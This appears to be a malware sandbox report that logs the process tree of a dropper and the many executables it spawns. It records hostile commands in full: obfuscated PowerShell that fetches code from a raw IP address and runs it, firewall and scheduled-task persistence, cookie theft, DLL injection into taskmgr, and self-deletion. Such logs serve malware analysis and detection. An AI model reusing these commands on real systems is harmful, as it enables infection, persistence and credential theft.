PID 2560 wrote to memory of 1160	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Folder.exe
PID 2560 wrote to memory of 3940	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Info.exe
PID 2560 wrote to memory of 3940	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Info.exe
PID 2560 wrote to memory of 3940	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Info.exe
PID 2560 wrote to memory of 4140	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Updbdate.exe
PID 2560 wrote to memory of 4140	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Updbdate.exe
PID 2560 wrote to memory of 4140	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Updbdate.exe
PID 2560 wrote to memory of 1432	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Install.exe
PID 2560 wrote to memory of 1432	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Install.exe
PID 2560 wrote to memory of 1432	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Install.exe
PID 2560 wrote to memory of 4596	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Files.exe
PID 2560 wrote to memory of 4596	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Files.exe
PID 2560 wrote to memory of 4596	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	Files.exe
PID 2560 wrote to memory of 4300	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	pub2.exe
PID 2560 wrote to memory of 4300	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	pub2.exe
PID 2560 wrote to memory of 4300	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	pub2.exe
PID 2560 wrote to memory of 4344	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	File.exe
PID 2560 wrote to memory of 4344	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	File.exe
PID 2560 wrote to memory of 4344	2560	7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe	File.exe
PID 1160 wrote to memory of 4860	1160	Folder.exe	WerFault.exe
PID 1160 wrote to memory of 4860	1160	Folder.exe	WerFault.exe
PID 1160 wrote to memory of 4860	1160	Folder.exe	WerFault.exe
PID 4596 wrote to memory of 4284	4596	Files.exe	jfiag3g_gg.exe
PID 4596 wrote to memory of 4284	4596	Files.exe	jfiag3g_gg.exe
PID 4596 wrote to memory of 4284	4596	Files.exe	jfiag3g_gg.exe
PID 1432 wrote to memory of 4236	1432	Install.exe	cmd.exe
PID 1432 wrote to memory of 4236	1432	Install.exe	cmd.exe
PID 1432 wrote to memory of 4236	1432	Install.exe	cmd.exe
PID 4236 wrote to memory of 3512	4236	cmd.exe	taskkill.exe
PID 4236 wrote to memory of 3512	4236	cmd.exe	taskkill.exe
PID 4236 wrote to memory of 3512	4236	cmd.exe	taskkill.exe
PID 4768 wrote to memory of 212	4768	rUNdlL32.eXe	rundll32.exe
PID 4768 wrote to memory of 212	4768	rUNdlL32.eXe	rundll32.exe
PID 4768 wrote to memory of 212	4768	rUNdlL32.eXe	rundll32.exe
PID 4596 wrote to memory of 1736	4596	Files.exe	jfiag3g_gg.exe
PID 4596 wrote to memory of 1736	4596	Files.exe	jfiag3g_gg.exe
PID 4596 wrote to memory of 1736	4596	Files.exe	jfiag3g_gg.exe
PID 5020 wrote to memory of 2024	5020	svchost.exe	Info.exe
PID 5020 wrote to memory of 2024	5020	svchost.exe	Info.exe
PID 5020 wrote to memory of 2024	5020	svchost.exe	Info.exe
PID 2024 wrote to memory of 4272	2024	Info.exe	cmd.exe
PID 2024 wrote to memory of 4272	2024	Info.exe	cmd.exe
PID 4272 wrote to memory of 3832	4272	cmd.exe	netsh.exe
PID 4272 wrote to memory of 3832	4272	cmd.exe	netsh.exe
PID 2024 wrote to memory of 1296	2024	Info.exe	csrss.exe
PID 2024 wrote to memory of 1296	2024	Info.exe	csrss.exe
PID 2024 wrote to memory of 1296	2024	Info.exe	csrss.exe
PID 5020 wrote to memory of 1876	5020	svchost.exe	schtasks.exe
PID 5020 wrote to memory of 1876	5020	svchost.exe	schtasks.exe
PID 4344 wrote to memory of 2104	4344	File.exe	LczuHO94nruzebUDQHFXKqYb.exe
PID 4344 wrote to memory of 2104	4344	File.exe	LczuHO94nruzebUDQHFXKqYb.exe
PID 4344 wrote to memory of 4820	4344	File.exe	9glrXkqH9i7GGQrFA3bkUmSJ.exe
PID 4344 wrote to memory of 4820	4344	File.exe	9glrXkqH9i7GGQrFA3bkUmSJ.exe
PID 4344 wrote to memory of 4820	4344	File.exe	9glrXkqH9i7GGQrFA3bkUmSJ.exe
PID 4344 wrote to memory of 4460	4344	File.exe	5YykviJ_Zodc46p_errdJids.exe
PID 4344 wrote to memory of 4460	4344	File.exe	5YykviJ_Zodc46p_errdJids.exe
PID 4344 wrote to memory of 4460	4344	File.exe	5YykviJ_Zodc46p_errdJids.exe

C:\Users\Admin\AppData\Local\Temp\7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe
"C:\Users\Admin\AppData\Local\Temp\7205b7e33d04e95a8037f961e615d18c5b35ea06c48f9af41f2235ef0b69d05f.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2560

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3252

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:2764

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1160

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
PID:4860

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:4140

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 368
3⤵
- Program crash
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 372
3⤵
- Program crash
PID:3932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 388
3⤵
- Program crash
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 664
3⤵
- Program crash
PID:2736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 664
3⤵
- Program crash
PID:2576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 664
3⤵
- Program crash
PID:3828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 728
3⤵
- Program crash
PID:4136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 736
3⤵
- Program crash
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 752
3⤵
- Program crash
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 664
3⤵
- Program crash
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 628
3⤵
- Program crash
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 844
3⤵
- Program crash
PID:1124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 664
3⤵
- Program crash
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 688
3⤵
- Program crash
PID:3464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 696
3⤵
- Program crash
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 776
3⤵
- Program crash
PID:4136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 472
4⤵
PID:1860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 748
3⤵
- Program crash
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 752
3⤵
- Program crash
PID:3252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 892
3⤵
- Program crash
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 876
3⤵
- Program crash
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 924
3⤵
- Program crash
PID:1124

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 332
4⤵
- Program crash
PID:2020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 336
4⤵
- Program crash
PID:3420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 336
4⤵
- Program crash
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 628
4⤵
- Program crash
PID:1072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 628
4⤵
- Program crash
PID:1356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 628
4⤵
- Program crash
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 628
4⤵
- Program crash
PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 708
4⤵
- Program crash
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 724
4⤵
- Program crash
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 580
4⤵
- Program crash
PID:3392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 840
4⤵
- Program crash
PID:1924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 720
4⤵
- Program crash
PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 860
4⤵
- Program crash
PID:4716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 784
4⤵
- Program crash
PID:4740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 864
4⤵
- Program crash
PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 700
4⤵
- Program crash
PID:3864

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:3832

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /94-94
4⤵
- Executes dropped EXE
PID:1296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 360
5⤵
- Program crash
PID:312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 364
5⤵
- Program crash
PID:3252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 392
5⤵
- Program crash
PID:4120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 624
5⤵
- Program crash
PID:4196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 700
5⤵
- Program crash
PID:2348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 700
5⤵
- Program crash
PID:3800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 736
5⤵
- Program crash
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 712
5⤵
- Program crash
PID:3068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 756
5⤵
- Program crash
PID:1224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 888
5⤵
- Program crash
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 812
5⤵
- Program crash
PID:2268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 648
5⤵
- Program crash
PID:2728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 648
5⤵
- Program crash
PID:964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 904
5⤵
- Program crash
PID:3720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 904
5⤵
- Program crash
PID:4284

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 964
5⤵
- Program crash
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 992
5⤵
- Program crash
PID:3460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 968
5⤵
- Program crash
PID:440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 940
5⤵
- Program crash
PID:968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1092
5⤵
- Program crash
PID:3392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1108
5⤵
- Program crash
PID:2664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1144
5⤵
- Program crash
PID:4744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1032
5⤵
- Program crash
PID:4000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1152
5⤵
- Program crash
PID:4740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1160
5⤵
- Program crash
PID:2064

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:964

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2524

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1036
5⤵
PID:4024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 1084
5⤵
PID:4220

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1432

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4236

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3512

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4596

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:4284

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1736

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4344

C:\Users\Admin\Pictures\Adobe Films\LczuHO94nruzebUDQHFXKqYb.exe
"C:\Users\Admin\Pictures\Adobe Films\LczuHO94nruzebUDQHFXKqYb.exe"
3⤵
- Executes dropped EXE
PID:2104

C:\Users\Admin\Pictures\Adobe Films\9glrXkqH9i7GGQrFA3bkUmSJ.exe
"C:\Users\Admin\Pictures\Adobe Films\9glrXkqH9i7GGQrFA3bkUmSJ.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4820

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4696

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2268

C:\Users\Admin\Pictures\Adobe Films\5YykviJ_Zodc46p_errdJids.exe
"C:\Users\Admin\Pictures\Adobe Films\5YykviJ_Zodc46p_errdJids.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:4460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 5YykviJ_Zodc46p_errdJids.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\5YykviJ_Zodc46p_errdJids.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:5752

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 5YykviJ_Zodc46p_errdJids.exe /f
5⤵
- Kills process with taskkill
PID:6012

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:3976

C:\Users\Admin\Pictures\Adobe Films\atzvKx4nr6Q1vieUIFrIao5s.exe
"C:\Users\Admin\Pictures\Adobe Films\atzvKx4nr6Q1vieUIFrIao5s.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 460
4⤵
- Program crash
PID:5060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 480
4⤵
PID:4000

C:\Users\Admin\Pictures\Adobe Films\ld_okjvwoT1yVDd8nHoegzoy.exe
"C:\Users\Admin\Pictures\Adobe Films\ld_okjvwoT1yVDd8nHoegzoy.exe"
3⤵
- Executes dropped EXE
PID:1036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Pictures\Adobe Films\ld_okjvwoT1yVDd8nHoegzoy.exe
4⤵
PID:4460

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
5⤵
PID:4976

C:\Users\Admin\Pictures\Adobe Films\Ntmr4VurBkePcu0Frkf64dAA.exe
"C:\Users\Admin\Pictures\Adobe Films\Ntmr4VurBkePcu0Frkf64dAA.exe"
3⤵
PID:4204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
PID:2944

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
5⤵
PID:1424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NAN.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
PID:4280

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
5⤵
PID:5352

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
5⤵
PID:5428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 316
6⤵
PID:5456

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
5⤵
PID:5104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NON.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
PID:4512

C:\Users\Admin\Pictures\Adobe Films\9B4KYHHZhCAUiQS4PWfpIftR.exe
"C:\Users\Admin\Pictures\Adobe Films\9B4KYHHZhCAUiQS4PWfpIftR.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:4980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:4620

C:\Users\Admin\Pictures\Adobe Films\A13J3utnAUpj4FYuLr1BNmPg.exe
"C:\Users\Admin\Pictures\Adobe Films\A13J3utnAUpj4FYuLr1BNmPg.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4148

C:\Users\Admin\Pictures\Adobe Films\2au1U3Sxz66Uu70W74ARzLOm.exe
"C:\Users\Admin\Pictures\Adobe Films\2au1U3Sxz66Uu70W74ARzLOm.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:868

C:\Users\Admin\Pictures\Adobe Films\lfOURd4ic1TO6jCMzih2CvoQ.exe
"C:\Users\Admin\Pictures\Adobe Films\lfOURd4ic1TO6jCMzih2CvoQ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5000

C:\Users\Admin\Pictures\Adobe Films\vk8VZZRPVzoDN0j8Eow_wmt2.exe
"C:\Users\Admin\Pictures\Adobe Films\vk8VZZRPVzoDN0j8Eow_wmt2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 468
4⤵
PID:4236

C:\Users\Admin\Pictures\Adobe Films\kOwUUuEfZcj2CeXc627itgCA.exe
"C:\Users\Admin\Pictures\Adobe Films\kOwUUuEfZcj2CeXc627itgCA.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 456
4⤵
PID:4616

C:\Users\Admin\Pictures\Adobe Films\gi27Ksb4YlbDxYWvkAR_a6UO.exe
"C:\Users\Admin\Pictures\Adobe Films\gi27Ksb4YlbDxYWvkAR_a6UO.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 468
4⤵
PID:3052

C:\Users\Admin\Pictures\Adobe Films\HKLNUgv6BDkBQC4h_3RUAIdm.exe
"C:\Users\Admin\Pictures\Adobe Films\HKLNUgv6BDkBQC4h_3RUAIdm.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
